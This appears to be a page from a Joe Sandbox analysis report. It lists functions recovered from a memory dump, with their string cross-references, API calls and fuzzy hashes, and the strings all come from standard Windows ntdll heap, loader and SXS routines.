Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory$I=w
API String ID: 0-1625034921
Opcode ID: bea4afdca20ae9f5afd8a7f71463a9741b9ea6add224ebd5eadd5d37fa5f3da2
Instruction ID: 474758026d708f2c49267cc1e72a09a4f2082515b8fd0fed78165f04ec0e29b2
Opcode Fuzzy Hash: bea4afdca20ae9f5afd8a7f71463a9741b9ea6add224ebd5eadd5d37fa5f3da2
Instruction Fuzzy Hash: DC818BB1A01748AFEB50CF94CD80BAEFBB9EB48714F204199F805B7250C774A985CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 3428FDF4 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3428FE28

Strings

HEAP: , xrefs: 3428FF26, 34290035, 3429015D, 34290202, 34290259
About to reallocate block at %p to %Ix bytes, xrefs: 3428FF3A
RtlReAllocateHeap, xrefs: 3428FE3F, 3428FEE2
HEAP[%wZ]: , xrefs: 3428FF19, 34290028, 34290150, 342901F5, 3429024C
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 34290053
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 3429026A
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 3429021F
Just reallocated block at %p to %Ix bytes, xrefs: 34290171

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 3446177414-1700792311
Opcode ID: c1ab03aed4915826d8078230bab97f456f4bb023ad537a94647bc65971a8d6c9
Instruction ID: 940328b9cdfb8295a554528dd20f8cc6d2585d7bdfe99cc54b84cc9f3f51a39a
Opcode Fuzzy Hash: c1ab03aed4915826d8078230bab97f456f4bb023ad537a94647bc65971a8d6c9
Instruction Fuzzy Hash: A0D1D175900A8ADFEB05CFA8C480AAEBBF2FF4A354F04819DE445BB252C735A951CF14

Uniqueness

Uniqueness Score: -1.00%

Function 342886C2 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 34288750
csrss.exe, xrefs: 34288700
DefaultBrowser_NOPUBLISHERID, xrefs: 34288880
smss.exe, xrefs: 3428870B
heapType, xrefs: 3428874B
lsass.exe, xrefs: 34288721
services.exe, xrefs: 34288716
svchost.exe, xrefs: 342886E8
runtimebroker.exe, xrefs: 342886F3
SegmentHeap, xrefs: 34288769

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: 84b01c4b35faccd98e726252e134eca80dbfb856a06e5e105007714bc2d777b9
Instruction ID: c0021d1168933116db414a4311192dae81175591741bbda3bb178e172c62da22
Opcode Fuzzy Hash: 84b01c4b35faccd98e726252e134eca80dbfb856a06e5e105007714bc2d777b9
Instruction Fuzzy Hash: CA517EB65047199FE325CF148C84BAFB7ECEF84290F40491EFDA9A6280E770D644CB92

Uniqueness

Uniqueness Score: -1.00%

Function 3428F0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3428F0D6

Strings

HEAP: , xrefs: 3428F274, 3428F321, 3428F378
Just allocated block at %p for %Ix bytes, xrefs: 3428F288
HEAP[%wZ]: , xrefs: 3428F267, 3428F314, 3428F36B
RtlAllocateHeap, xrefs: 3428F0ED
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 3428F389
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 3428F33E

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 3446177414-1745908468
Opcode ID: 9577307b99b9f8000dbea91a5f886a9dc1245d63fdbf75b3503d2dfb04317bb5
Instruction ID: d76ae675b129dd96a73b5609836034e6ae88e65551b3bcd2c640c5c6375fa35b
Opcode Fuzzy Hash: 9577307b99b9f8000dbea91a5f886a9dc1245d63fdbf75b3503d2dfb04317bb5
Instruction Fuzzy Hash: 4D91D275A01A85DFEB01DFA8C480AADFBF2FF4A350F15809DE445B7291CB359941CB14

Uniqueness

Uniqueness Score: -1.00%

Function 341D640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 341D651C

Part of subcall function 341D6565: RtlDebugPrintTimes.NTDLL ref: 341D6614
Part of subcall function 341D6565: RtlDebugPrintTimes.NTDLL ref: 341D665F

Strings

LdrpInitShimEngine, xrefs: 34239783, 34239796, 342397BF
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 342397B9
Getting the shim engine exports failed with status 0x%08lx, xrefs: 34239790
minkernel\ntdll\ldrinit.c, xrefs: 342397A0, 342397C9
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3423977C
apphelp.dll, xrefs: 341D6446

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-204845295
Opcode ID: dd1b3577605f34bbb903460cbc24ba13f98adebb97a396243df8542ea392b27a
Instruction ID: 8778411cdde197d29d617fbd54326dbb8800416778c89af84759ed56dd1ac633
Opcode Fuzzy Hash: dd1b3577605f34bbb903460cbc24ba13f98adebb97a396243df8542ea392b27a
Instruction Fuzzy Hash: 3D51D0B1A08B009FF310DF25CC90F6BBBE9EB86644F40095EF595A72A0DA30D945CF92

Uniqueness

Uniqueness Score: -1.00%

Function 341DD02D Relevance: 11.5, Strings: 9, Instructions: 249COMMON

Download Yara Rule

Strings

\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 341DD263
@, xrefs: 341DD2B3
Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 341DD0E6
@, xrefs: 341DD24F
h. 4, xrefs: 3423A5D2
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 341DD06F
Control Panel\Desktop\LanguageConfiguration, xrefs: 341DD136
Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 341DD202
@, xrefs: 341DD09D

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration$h. 4
API String ID: 0-590232057
Opcode ID: 26712882d516e2d8f33522e532cba9ddb5da795f45198bc5e603306e5eafbdd9
Instruction ID: ae7e311ef42980bbcc4b5db6fd9f49b1881f6a793e1d7539a79c3b4a2bf282a1
Opcode Fuzzy Hash: 26712882d516e2d8f33522e532cba9ddb5da795f45198bc5e603306e5eafbdd9
Instruction Fuzzy Hash: 97A149B1908745DFE321CF24C480BABB7E8FB89765F41492EE598A6240D774D908CF93

Uniqueness

Uniqueness Score: -1.00%

Function 3420D6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3420D879

Part of subcall function 341E4779: RtlDebugPrintTimes.NTDLL ref: 341E4817

Strings

LdrShutdownProcess, xrefs: 3424F0D8
minkernel\ntdll\ldrinit.c, xrefs: 3424F0E2
$, xrefs: 3420D820
$, xrefs: 3420D78D
Process 0x%p (%wZ) exiting, xrefs: 3424F0D1

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1975516107
Opcode ID: 481aa36dcc576a62bb75f752c5c6609ad44caebf103f0f4e2167e9aba53010fd
Instruction ID: 5a03c6aa798849d532579a371e3bc8a1f59c5ff3093570d2704937aeabe01220
Opcode Fuzzy Hash: 481aa36dcc576a62bb75f752c5c6609ad44caebf103f0f4e2167e9aba53010fd
Instruction Fuzzy Hash: C551A975E153468FEB14CBA8C888799BBF2FB45304F608199D411BB291D7B1A986CF90

Uniqueness

Uniqueness Score: -1.00%

Function 3428F51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 3428F55F, 3428F5A4, 3428F5F0, 3428F655, 3428F6A3, 3428F6EA
HEAP[%wZ]: , xrefs: 3428F552, 3428F597, 3428F5E3, 3428F648, 3428F696, 3428F6DD
May not specify Lock parameter with HEAP_NO_SERIALIZE, xrefs: 3428F5FB
Invalid CommitSize parameter - %Ix, xrefs: 3428F5B2
Invalid ReserveSize parameter - %Ix, xrefs: 3428F56B
Specified HeapBase (%p) invalid, Status = %lx, xrefs: 3428F664
Specified HeapBase (%p) is free or not writable, xrefs: 3428F6F8
Specified HeapBase (%p) != to BaseAddress (%p), xrefs: 3428F6B2

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
API String ID: 0-2224505338
Opcode ID: 26679d1be1bb12a42eac78c639093430d548a5707cc44e530297cd142a1c8218
Instruction ID: 6f6fefd1cd5e66fb1f9adff3af49e7446cc6bc31c6e0f13dcdfa2b7b4ce30692
Opcode Fuzzy Hash: 26679d1be1bb12a42eac78c639093430d548a5707cc44e530297cd142a1c8218
Instruction Fuzzy Hash: F95146B6211A85EFE705CF54C8C4F2EB3A9EF096A4F12859DF402BB296CA35D950CE10

Uniqueness

Uniqueness Score: -1.00%

Function 34268633 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 342686BD
VerifierFlags, xrefs: 342688D0
VerifierDlls, xrefs: 3426893D
AVRF: -*- final list of providers -*- , xrefs: 3426880F
VerifierDebug, xrefs: 34268925
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 342686E7
HandleTraces, xrefs: 3426890F

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 6fd6b37987b18dbeb1b53fc4835a1497d09dae8b377a47de956134271e08576f
Instruction ID: c1c9eba3f5a39eebcd7ad56135e94016a96889292888d4b832a31190b03bf975
Opcode Fuzzy Hash: 6fd6b37987b18dbeb1b53fc4835a1497d09dae8b377a47de956134271e08576f
Instruction Fuzzy Hash: 319136B1A06712DFE311CF288884B1A77E9EB45758F45055CFC967B240CBB89C85CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 341DF113 Relevance: 8.2, Strings: 6, Instructions: 684COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 3423DCF3, 3423DE37, 3423E015, 3423E12D
((LONG)FreeEntry->Size > 1), xrefs: 3423DE42
HEAP[%wZ]: , xrefs: 3423DCE6, 3423DE2A, 3423E008, 3423E120
(LONG)FreeEntry->Size > 1, xrefs: 3423E020
(UCRBlock != NULL), xrefs: 3423DCFE
(!TrailingUCR), xrefs: 3423E138

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: 4cc3a00641c1f8b380507a2c4d23a6165160ead0f002e695d79b6076ab6b6ca2
Instruction ID: 50196e88e5ce788249be6feaad86480c312b622dbcc7801b2df5855ec0b2816a
Opcode Fuzzy Hash: 4cc3a00641c1f8b380507a2c4d23a6165160ead0f002e695d79b6076ab6b6ca2
Instruction Fuzzy Hash: 3642FFB5215B81DFE304CF28C8D0B6ABBF6FF89644F0449ADE8859B251DB30DA45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 3420510F Relevance: 7.9, Strings: 6, Instructions: 434COMMON

Download Yara Rule

Strings

h. 4, xrefs: 34205410, 342053CF, 3424BA6D, 342052FD, 3424BA09, 34205224, 34205227, 34205300, 342053D2, 34205413, 3424BA0C, 3424BA70
WindowsExcludedProcs, xrefs: 3420514A
Kernel-MUI-Language-SKU, xrefs: 3420534B
Kernel-MUI-Language-Disallowed, xrefs: 34205272
Kernel-MUI-Language-Allowed, xrefs: 3420519B
Kernel-MUI-Number-Allowed, xrefs: 34205167

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h. 4
API String ID: 0-841466353
Opcode ID: dbc369fffedf19040a0a1843bce05b40b22f78de0c62b65415401817ad591ffe
Instruction ID: 226bffa756e12048b65d1ce81b0cfca549eafb2bb1a24a1c139bd62f77236352
Opcode Fuzzy Hash: dbc369fffedf19040a0a1843bce05b40b22f78de0c62b65415401817ad591ffe
Instruction Fuzzy Hash: 41F139B6D11629EFDB55CF98C980ADEBBF9EF08650F50406AE501B7210EB709E41CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 341FB0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON

Download Yara Rule

Strings

API set, xrefs: 34248201, 34248206
DLL %wZ was redirected to %wZ by %s, xrefs: 34248209
LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 342482DD
LdrpPreprocessDllName, xrefs: 34248210, 342482E4
minkernel\ntdll\ldrutil.c, xrefs: 3424821A, 342482EE
SxS, xrefs: 342481FA

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: d0a8cf8b16fa91c92a95fe79090a5e2fcd7df41bdb07433371de38afaa5e4c6c
Instruction ID: 2508c2f6a881e6c46b35af385a1a7ce99ca0e3745d1e98327105317be5b6dca4
Opcode Fuzzy Hash: d0a8cf8b16fa91c92a95fe79090a5e2fcd7df41bdb07433371de38afaa5e4c6c
Instruction Fuzzy Hash: 64C14675A04B559FEB188B64CCD0BBF77A5EF45340F5482A9EC42AB290EB71D846C390

Uniqueness

Uniqueness Score: -1.00%

Function 34212594 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 34251F82
SXS: %s() passed the empty activation context, xrefs: 34251F6F
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 34251FA9
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 34251F8A
RtlGetAssemblyStorageRoot, xrefs: 34251F6A, 34251FA4, 34251FC4
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 34251FC9

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: a81b95351a98c38172e5663c72fdc8d0ef367ef9326ec3727915325ea69bc584
Instruction ID: bf4412158b6b113629e1819fdf727b46b9fd686137d93cdc7e2c4b5b5015bdc3
Opcode Fuzzy Hash: a81b95351a98c38172e5663c72fdc8d0ef367ef9326ec3727915325ea69bc584
Instruction Fuzzy Hash: E931F6B6F00365BBF7108A869C80F6BB7AC9B50694F01459DBA01B7254D7F0EE00CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 3421C5C6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

Unable to build import redirection Table, Status = 0x%x, xrefs: 34257FF0
minkernel\ntdll\ldrredirect.c, xrefs: 34257F8C, 34258000
LdrpInitializeImportRedirection, xrefs: 34257F82, 34257FF6
LdrpInitializeProcess, xrefs: 3421C5E4
minkernel\ntdll\ldrinit.c, xrefs: 3421C5E3
Loading import redirection DLL: '%wZ', xrefs: 34257F7B

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 5f8921965e5857d0f55fb4ee1e6e4f1793164a7be8a3a44a16eb7a4e77ffbd52
Instruction ID: d2401f5ea8bd4cc838ea46287c580158c6cb901dd2b422229d53796da5284f9b
Opcode Fuzzy Hash: 5f8921965e5857d0f55fb4ee1e6e4f1793164a7be8a3a44a16eb7a4e77ffbd52
Instruction Fuzzy Hash: 693103B5A04746EFE314DF28DC85E2ABBD4EF95750F004598F886BB2A0D660DC05CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 341F0680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 34244ECA
HEAP[%wZ]: , xrefs: 34244EBB
(UCRBlock->Size >= *Size), xrefs: 34244ED7

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: b4dd9975f6e224a9d0787e6f8fb5c650c20cb7182fd9415f84669f096575be6c
Instruction ID: 97d3c3bce246db15b1d296b110c26b0f601cc54ba8e7cd13b461d71520397a26
Opcode Fuzzy Hash: b4dd9975f6e224a9d0787e6f8fb5c650c20cb7182fd9415f84669f096575be6c
Instruction Fuzzy Hash: F6F1AD74B00A06DFE719CF68C894B6ABBB5FF44340F118299E555AB381DB71E982CF90

Uniqueness

Uniqueness Score: -1.00%

Function 34209723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 34209922

Strings

LdrpUnloadNode, xrefs: 3424DAF5
Unmapping DLL "%wZ", xrefs: 3424DAEE
minkernel\ntdll\ldrsnap.c, xrefs: 3424DAFF

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-2283098728
Opcode ID: f593fbde525902ee7ac7a3341b67f736761c774f0db6866f37e094fbfa4e26b8
Instruction ID: 524c6ee39faba7941e3f62d63237228e7d3114c94ab95c1706a09b8614175a71
Opcode Fuzzy Hash: f593fbde525902ee7ac7a3341b67f736761c774f0db6866f37e094fbfa4e26b8
Instruction Fuzzy Hash: 0B51E1B57047029FE724DF3AC884B19B7E6BB85310F0486ADE452B72A1DB71A845CF92

Uniqueness

Uniqueness Score: -1.00%

Function 3421C640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3421C6DF

Strings

minkernel\ntdll\ldrinit.c, xrefs: 342580F3
Failed to reallocate the system dirs string !, xrefs: 342580E2
LdrpInitializePerUserWindowsDirectory, xrefs: 342580E9

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1783798831
Opcode ID: a65722d60e83b6a55c88e667e53efc8b256575eb105147cbf8d6c7a0b408f8d0
Instruction ID: 16fb4ad655665826b0fe7ee5fc98ff0a5dbc7b067635c322c5448b50c280ff78
Opcode Fuzzy Hash: a65722d60e83b6a55c88e667e53efc8b256575eb105147cbf8d6c7a0b408f8d0
Instruction Fuzzy Hash: DE41C2B9910741EFE710EF69CC89B5BBBE9EB85650F00492AB858B3260DB74D801CF95

Uniqueness

Uniqueness Score: -1.00%

Function 342BACEB Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 342BAEA9
RtlDebugPrintTimes.NTDLL ref: 342BB185

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
